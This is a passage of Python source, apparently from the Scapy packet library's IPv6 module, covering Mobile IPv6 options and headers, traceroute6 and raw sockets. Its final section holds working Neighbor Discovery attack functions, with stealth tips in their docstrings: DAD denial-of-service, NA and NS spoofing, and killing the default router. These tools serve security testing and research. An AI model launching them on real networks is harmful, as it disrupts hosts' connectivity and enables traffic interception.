much work for our current needs. It is left to the user (I mean ... # you). --arno class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) name = "MIPv6 Option - Mobility Message Authentication" fields_desc = [ByteEnumField("otype", 9, _mobopttypes), FieldLenField("olen", None, length_of="authdata", fmt="B", adjust=lambda pkt, x: x + 5), ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 2: "MN-AAA authentication mobility option"}), # noqa: E501 IntField("mspi", None), StrLenField("authdata", "A" * 12, length_from=lambda pkt: pkt.olen - 5)] x = 4 y = 1 # alignment requirement: 4n+1 # Extracted from RFC 1305 (NTP) : # NTP timestamps are represented as a 64-bit unsigned fixed-point number, # in seconds relative to 0h on 1 January 1900. The integer part is in the # first 32 bits and the fraction part in the last 32 bits. class NTPTimestampField(LongField): def i2repr(self, pkt, x): if x < ((50 * 31536000) << 32): return "Some date a few decades ago (%d)" % x # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to # January 1st 1970 : delta = -2209075761 i = int(x >> 32) j = float(x & 0xffffffff) * 2.0**-32 res = i + j + delta t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) return "%s (%d)" % (t, x) class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6) name = "MIPv6 option - Replay Protection" fields_desc = [ByteEnumField("otype", 10, _mobopttypes), ByteField("olen", 8), NTPTimestampField("timestamp", 0)] x = 8 y = 2 # alignment requirement: 8n+2 class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) name = "MIPv6 option - CGA Parameters Request" fields_desc = [ByteEnumField("otype", 11, _mobopttypes), ByteField("olen", 0)] x = 0 y = 0 # alignment requirement: none # XXX TODO: deal with CGA param fragmentation and build of defragmented # XXX version. Passing of a big CGAParam structure should be # XXX simplified. Make it hold packets, by the way --arno class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) name = "MIPv6 option - CGA Parameters" fields_desc = [ByteEnumField("otype", 12, _mobopttypes), FieldLenField("olen", None, length_of="cgaparams", fmt="B"), StrLenField("cgaparams", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) name = "MIPv6 option - Signature" fields_desc = [ByteEnumField("otype", 13, _mobopttypes), FieldLenField("olen", None, length_of="sig", fmt="B"), StrLenField("sig", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) name = "MIPv6 option - Home Keygen Token" fields_desc = [ByteEnumField("otype", 14, _mobopttypes), FieldLenField("olen", None, length_of="hkt", fmt="B"), StrLenField("hkt", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) name = "MIPv6 option - Care-of Test Init" fields_desc = [ByteEnumField("otype", 15, _mobopttypes), ByteField("olen", 0)] x = 0 y = 0 # alignment requirement: none class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5) name = "MIPv6 option - Care-of Test" fields_desc = [ByteEnumField("otype", 16, _mobopttypes), FieldLenField("olen", None, length_of="cokt", fmt="B"), StrLenField("cokt", b'\x00' * 8, length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptUnknown(_MIP6OptAlign): name = 'Scapy6 - Unknown Mobility Option' fields_desc = [ByteEnumField("otype", 6, _mobopttypes), FieldLenField("olen", None, length_of="odata", fmt="B"), StrLenField("odata", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): if _pkt: o = orb(_pkt[0]) # Option type if o in moboptcls: return moboptcls[o] return cls moboptcls = {0: Pad1, 1: PadN, 2: MIP6OptBRAdvice, 3: MIP6OptAltCoA, 4: MIP6OptNonceIndices, 5: MIP6OptBindingAuthData, 6: MIP6OptMobNetPrefix, 7: MIP6OptLLAddr, 8: MIP6OptMNID, 9: MIP6OptMsgAuth, 10: MIP6OptReplayProtection, 11: MIP6OptCGAParamsReq, 12: MIP6OptCGAParams, 13: MIP6OptSignature, 14: MIP6OptHomeKeygenToken, 15: MIP6OptCareOfTestInit, 16: MIP6OptCareOfTest} # Main Mobile IPv6 Classes mhtypes = {0: 'BRR', 1: 'HoTI', 2: 'CoTI', 3: 'HoT', 4: 'CoT', 5: 'BU', 6: 'BA', 7: 'BE', 8: 'Fast BU', 9: 'Fast BA', 10: 'Fast NA'} # From http://www.iana.org/assignments/mobility-parameters bastatus = {0: 'Binding Update accepted', 1: 'Accepted but prefix discovery necessary', 128: 'Reason unspecified', 129: 'Administratively prohibited', 130: 'Insufficient resources', 131: 'Home registration not supported', 132: 'Not home subnet', 133: 'Not home agent for this mobile node', 134: 'Duplicate Address Detection failed', 135: 'Sequence number out of window', 136: 'Expired home nonce index', 137: 'Expired care-of nonce index', 138: 'Expired nonces', 139: 'Registration type change disallowed', 140: 'Mobile Router Operation not permitted', 141: 'Invalid Prefix', 142: 'Not Authorized for Prefix', 143: 'Forwarding Setup failed (prefixes missing)', 144: 'MIPV6-ID-MISMATCH', 145: 'MIPV6-MESG-ID-REQD', 146: 'MIPV6-AUTH-FAIL', 147: 'Permanent home keygen token unavailable', 148: 'CGA and signature verification failed', 149: 'Permanent home keygen token exists', 150: 'Non-null home nonce index expected'} class _MobilityHeader(Packet): name = 'Dummy IPv6 Mobility Header' overload_fields = {IPv6: {"nh": 135}} def post_build(self, p, pay): p += pay tmp_len = self.len if self.len is None: tmp_len = (len(p) - 8) // 8 p = p[:1] + struct.pack("B", tmp_len) + p[2:] if self.cksum is None: cksum = in6_chksum(135, self.underlayer, p) else: cksum = self.cksum p = p[:4] + struct.pack("!H", cksum) + p[6:] return p class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg name = "IPv6 Mobility Header - Generic Message" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", None, mhtypes), ByteField("res", None), XShortField("cksum", None), StrLenField("msg", b"\x00" * 2, length_from=lambda pkt: 8 * pkt.len - 6)] class MIP6MH_BRR(_MobilityHeader): name = "IPv6 Mobility Header - Binding Refresh Request" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 0, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("res2", None), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 8, length_from=lambda pkt: 8 * pkt.len)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: BRR, BU and BA have the same hashret that returns the same # value b"\x00\x08\x09" (concatenation of mhtypes). This is # because we need match BA with BU and BU with BRR. --arno return b"\x00\x08\x09" class MIP6MH_HoTI(_MobilityHeader): name = "IPv6 Mobility Header - Home Test Init" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 1, mhtypes), ByteField("res", None), XShortField("cksum", None), StrFixedLenField("reserved", b"\x00" * 2, 2), StrFixedLenField("cookie", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 16, length_from=lambda pkt: 8 * (pkt.len - 1))] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} def hashret(self): return bytes_encode(self.cookie) class MIP6MH_CoTI(MIP6MH_HoTI): name = "IPv6 Mobility Header - Care-of Test Init" mhtype = 2 def hashret(self): return bytes_encode(self.cookie) class MIP6MH_HoT(_MobilityHeader): name = "IPv6 Mobility Header - Home Test" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 3, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("index", None), StrFixedLenField("cookie", b"\x00" * 8, 8), StrFixedLenField("token", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 24, length_from=lambda pkt: 8 * (pkt.len - 2))] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} def hashret(self): return bytes_encode(self.cookie) def answers(self, other): if (isinstance(other, MIP6MH_HoTI) and self.cookie == other.cookie): return 1 return 0 class MIP6MH_CoT(MIP6MH_HoT): name = "IPv6 Mobility Header - Care-of Test" mhtype = 4 def hashret(self): return bytes_encode(self.cookie) def answers(self, other): if (isinstance(other, MIP6MH_CoTI) and self.cookie == other.cookie): return 1 return 0 class LifetimeField(ShortField): def i2repr(self, pkt, x): return "%d sec" % (4 * x) class MIP6MH_BU(_MobilityHeader): name = "IPv6 Mobility Header - Binding Update" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 5, mhtypes), ByteField("res", None), XShortField("cksum", None), XShortField("seq", None), # TODO: ShortNonceField FlagsField("flags", "KHA", 7, "PRMKLHA"), XBitField("reserved", 0, 9), LifetimeField("mhtime", 3), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, length_from=lambda pkt: 8 * pkt.len - 4)] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return b"\x00\x08\x09" def answers(self, other): if isinstance(other, MIP6MH_BRR): return 1 return 0 class MIP6MH_BA(_MobilityHeader): name = "IPv6 Mobility Header - Binding ACK" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 6, mhtypes), ByteField("res", None), XShortField("cksum", None), ByteEnumField("status", 0, bastatus), FlagsField("flags", "K", 3, "PRK"), XBitField("res2", None, 5), XShortField("seq", None), # TODO: ShortNonceField XShortField("mhtime", 0), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, length_from=lambda pkt: 8 * pkt.len - 4)] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return b"\x00\x08\x09" def answers(self, other): if (isinstance(other, MIP6MH_BU) and other.mhtype == 5 and self.mhtype == 6 and other.flags & 0x1 and # Ack request flags is set self.seq == other.seq): return 1 return 0 _bestatus = {1: 'Unknown binding for Home Address destination option', 2: 'Unrecognized MH Type value'} # TODO: match Binding Error to its stimulus class MIP6MH_BE(_MobilityHeader): name = "IPv6 Mobility Header - Binding Error" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 7, mhtypes), ByteField("res", 0), XShortField("cksum", None), ByteEnumField("status", 0, _bestatus), ByteField("reserved", 0), IP6Field("ha", "::"), _OptionsField("options", [], MIP6OptUnknown, 24, length_from=lambda pkt: 8 * (pkt.len - 2))] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} _mip6_mhtype2cls = {0: MIP6MH_BRR, 1: MIP6MH_HoTI, 2: MIP6MH_CoTI, 3: MIP6MH_HoT, 4: MIP6MH_CoT, 5: MIP6MH_BU, 6: MIP6MH_BA, 7: MIP6MH_BE} ############################################################################# ############################################################################# # Traceroute6 # ############################################################################# ############################################################################# class AS_resolver6(AS_resolver_riswhois): def _resolve_one(self, ip): """ overloaded version to provide a Whois resolution on the embedded IPv4 address if the address is 6to4 or Teredo. Otherwise, the native IPv6 address is passed. """ if in6_isaddr6to4(ip): # for 6to4, use embedded @ tmp = inet_pton(socket.AF_INET6, ip) addr = inet_ntop(socket.AF_INET, tmp[2:6]) elif in6_isaddrTeredo(ip): # for Teredo, use mapped address addr = teredoAddrExtractInfo(ip)[2] else: addr = ip _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) if asn.startswith("AS"): try: asn = int(asn[2:]) except ValueError: pass return ip, asn, desc class TracerouteResult6(TracerouteResult): __slots__ = [] def show(self): return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501 s.hlim, r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 def get_trace(self): trace = {} for s, r in self.res: if IPv6 not in s: continue d = s[IPv6].dst if d not in trace: trace[d] = {} t = not (ICMPv6TimeExceeded in r or ICMPv6DestUnreach in r or ICMPv6PacketTooBig in r or ICMPv6ParamProblem in r) trace[d][s[IPv6].hlim] = r[IPv6].src, t for k in six.itervalues(trace): try: m = min(x for x, y in six.iteritems(k) if y[1]) except ValueError: continue for l in list(k): # use list(): k is modified in the loop if l > m: del k[l] return trace def graph(self, ASres=AS_resolver6(), **kargs): TracerouteResult.graph(self, ASres=ASres, **kargs) @conf.commands.register def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), l4=None, timeout=2, verbose=None, **kargs): """Instant TCP traceroute using IPv6 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None """ if verbose is None: verbose = conf.verb if l4 is None: a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 else: a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, timeout=timeout, verbose=verbose, **kargs) a = TracerouteResult6(a.res) if verbose: a.display() return a, b ############################################################################# ############################################################################# # Sockets # ############################################################################# ############################################################################# class L3RawSocket6(L3RawSocket): def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 L3RawSocket.__init__(self, type, filter, iface, promisc) # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 def IPv6inIP(dst='203.178.135.36', src=None): _IPv6inIP.dst = dst _IPv6inIP.src = src if not conf.L3socket == _IPv6inIP: _IPv6inIP.cls = conf.L3socket else: del(conf.L3socket) return _IPv6inIP class _IPv6inIP(SuperSocket): dst = '127.0.0.1' src = None cls = None def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 SuperSocket.__init__(self, family, type, proto) self.worker = self.cls(**args) def set(self, dst, src=None): _IPv6inIP.src = src _IPv6inIP.dst = dst def nonblock_recv(self): p = self.worker.nonblock_recv() return self._recv(p) def recv(self, x): p = self.worker.recv(x) return self._recv(p, x) def _recv(self, p, x=MTU): if p is None: return p elif isinstance(p, IP): # TODO: verify checksum if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: if isinstance(p.payload, IPv6): return p.payload return p def send(self, x): return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 ############################################################################# ############################################################################# # Neighbor Discovery Protocol Attacks # ############################################################################# ############################################################################# def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Internal generic helper accepting a specific callback as first argument, for NS or NA reply. See the two specific functions below. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 # Get and compare the MAC address mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must be the unspecified address if req[IPv6].src != "::": return 0 # Check destination is the link-local solicited-node multicast # address associated with target address in received NS tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: return 0 return 1 if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, iface), iface=iface) def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages sent from the unspecified address and sending a NS reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NS sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the unspecified address (::). - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. """ def ns_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS by sending a similar NS """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 sendp(rep, iface=iface, verbose=0) print("Reply NS for target address %s (received from %s)" % (tgt, mac)) _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages *sent from the unspecified address* and sending a NA reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address found in received NS. - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. """ def na_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS with a NA """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print("Reply NA for target address %s (received from %s)" % (tgt, mac)) _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None, router=False): """ The main purpose of this function is to send fake Neighbor Advertisement messages to a victim. As the emission of unsolicited Neighbor Advertisement is pretty pointless (from an attacker standpoint) because it will not lead to a modification of a victim's neighbor cache, the function send advertisements in response to received NS (NS sent as part of the DAD, i.e. with an unspecified address as source, are not considered). By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address - as IPv6 destination address: the source IPv6 address of received NS message. - the mac address of the interface as source (or reply_mac, see below). - the source mac address of the received NS as destination macs address of the emitted NA. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. router: by the default (False) the 'R' flag in the NA used for the reply is not set. If the parameter is set to True, the 'R' flag in the NA is set, advertising us as a router. Please, keep the following in mind when using the function: for obvious reasons (kernel space vs. Python speed), when the target of the address resolution is on the link, the sender of the NS receives 2 NA messages in a row, the valid one and our fake one. The second one will overwrite the information provided by the first one, i.e. the natural latency of Scapy helps here. In practice, on a common Ethernet link, the emission of the NA from the genuine target (kernel stack) usually occurs in the same millisecond as the receipt of the NS. The NA generated by Scapy6 will usually come after something 20+ ms. On a usual testbed for instance, this difference is sufficient to have the first data packet sent from the victim to the destination before it even receives our fake NA. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must NOT be the unspecified address if req[IPv6].src == "::": return 0 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 dst = req[IPv6].dst if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. # If this is a real address resolution NS, then the destination # address of the packet is the link-local solicited node multicast # address associated with the target of the NS. # Otherwise, the NS is a NUD related one, i.e. the peer is # unicasting the NS to check the target is still alive (L2 # information is still in its cache and it is verified) received_snma = inet_pton(socket.AF_INET6, dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: print("solicited node multicast @ does not match target @!") return 0 return 1 def reply_callback(req, reply_mac, router, iface): """ Callback that reply to a NS with a spoofed NA """ # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and # send it back. mac = req[Ether].src pkt = req[IPv6] src = pkt.src tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) # Use the target field from the NS rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 # "If the solicitation IP Destination Address is not a multicast # address, the Target Link-Layer Address option MAY be omitted" # Given our purpose, we always include it. rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print("Reply NA for target address %s (received from %s)" % (tgt, mac)) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac router = (router and 1) or 0 # Value of the R flags in NA sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, router, iface), iface=iface) def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", dst=None, src_mac=None, dst_mac=None, loop=True, inter=1, iface=None): """ The main purpose of this function is to send fake Neighbor Solicitations messages to a victim, in order to either create a new entry in its neighbor cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated that a node SHOULD create the entry or update an existing one (if it is not currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 state is set to STALE. The two main parameters of the function are the source link-layer address (carried by the Source Link-Layer Address option in the NS) and the source address of the packet. Unlike some other NDP_Attack_* function, this one is not based on a stimulus/response model. When called, it sends the same NS packet in loop every second (the default) Following arguments can be used to change the format of the packets: src_lladdr: the MAC address used in the Source Link-Layer Address option included in the NS packet. This is the address that the peer should associate in its neighbor cache with the IPv6 source address of the packet. If None is provided, the mac address of the interface is used. src: the IPv6 address used as source of the packet. If None is provided, an address associated with the emitting interface will be used (based on the destination address of the packet). target: the target address of the NS packet. If no value is provided, a dummy address (2001:db8::1) is used. The value of the target has a direct impact on the destination address of the packet if it is not overridden. By default, the solicited-node multicast address associated with the target is used as destination address of the packet. Consider specifying a specific destination address if you intend to use a target address different than the one of the victim. dst: The destination address of the NS. By default, the solicited node multicast address associated with the target address (see previous parameter) is used if no specific value is provided. The victim is not expected to check the destination address of the packet, so using a multicast address like ff02::1 should work if you want the attack to target all hosts on the link. On the contrary, if you want to be more stealth, you should provide the target address for this parameter in order for the packet to be sent only to the victim. src_mac: the MAC address used as source of the packet. By default, this is the address of the interface. If you want to be more stealth, feel free to use something else. Note that this address is not the that the victim will use to populate its neighbor cache. dst_mac: The MAC address used as destination address of the packet. If the IPv6 destination address is multicast (all-nodes, solicited node, ...), it will be computed. If the destination address is unicast, a neighbor solicitation will be performed to get the associated address. If you want the attack to be stealth, you can provide the MAC address using this parameter. loop: By default, this parameter is True, indicating that NS packets will be sent in loop, separated by 'inter' seconds (see below). When set to False, a single packet is sent. inter: When loop parameter is True (the default), this parameter provides the interval in seconds used for sending NS packets. iface: to force the sending interface. """ if not iface: iface = conf.iface # Use provided MAC address as source link-layer address option # or the MAC address of the interface if none is provided. if not src_lladdr: src_lladdr = get_if_hwaddr(iface) # Prepare packets parameters ether_params = {} if src_mac: ether_params["src"] = src_mac if dst_mac: ether_params["dst"] = dst_mac ipv6_params = {} if src: ipv6_params["src"] = src if dst: ipv6_params["dst"] = dst else: # Compute the solicited-node multicast address # associated with the target address. tmp = inet_ntop(socket.AF_INET6, in6_getnsma(inet_pton(socket.AF_INET6, target))) ipv6_params["dst"] = tmp pkt = Ether(**ether_params) pkt /= IPv6(**ipv6_params) pkt /= ICMPv6ND_NS(tgt=target) pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, ip_src_filter=None, reply_mac=None, tgt_mac=None): """ The purpose of the function is to monitor incoming RA messages sent by default routers (RA with a non-zero Router Lifetime values) and invalidate them by immediately replying with fake RA messages advertising a zero Router Lifetime value. The result on receivers is that the router is immediately invalidated, i.e. the associated entry is discarded from the default router list and destination cache is updated to reflect the change. By default, the function considers all RA messages with a non-zero Router Lifetime value but provides configuration knobs to allow filtering RA sent by specific routers (Ethernet source address). With regard to emission, the multicast all-nodes address is used by default but a specific target can be used, in order for the DoS to apply only to a specific host. More precisely, following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RA messages received from this source will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific mac address. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RA messages received from this source address will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific IPv6 source address. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. tgt_mac: allow limiting the effect of the DoS to a specific host, by sending the "invalidating RA" only to its mac address. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 # Check if this is an advertisement for a Default Router # by looking at Router Lifetime value if req[ICMPv6ND_RA].routerlifetime == 0: return 0 return 1 def ra_reply_callback(req, reply_mac, tgt_mac, iface): """ Callback that sends an RA with a 0 lifetime """ # Let's build a reply and send it src = req[IPv6].src # Prepare packets parameters ether_params = {} if reply_mac: ether_params["src"] = reply_mac if tgt_mac: ether_params["dst"] = tgt_mac # Basis of fake RA (high pref, zero lifetime) rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) # Add it a PIO from the request ... tmp = req while ICMPv6NDOptPrefixInfo in tmp: pio = tmp[ICMPv6NDOptPrefixInfo] tmp = pio.payload del(pio.payload) rep /= pio # ... and source link layer address option if ICMPv6NDOptSrcLLAddr in req: mac = req[ICMPv6NDOptSrcLLAddr].lladdr else: mac = req[Ether].src rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) sendp(rep, iface=iface, verbose=0) print("Fake 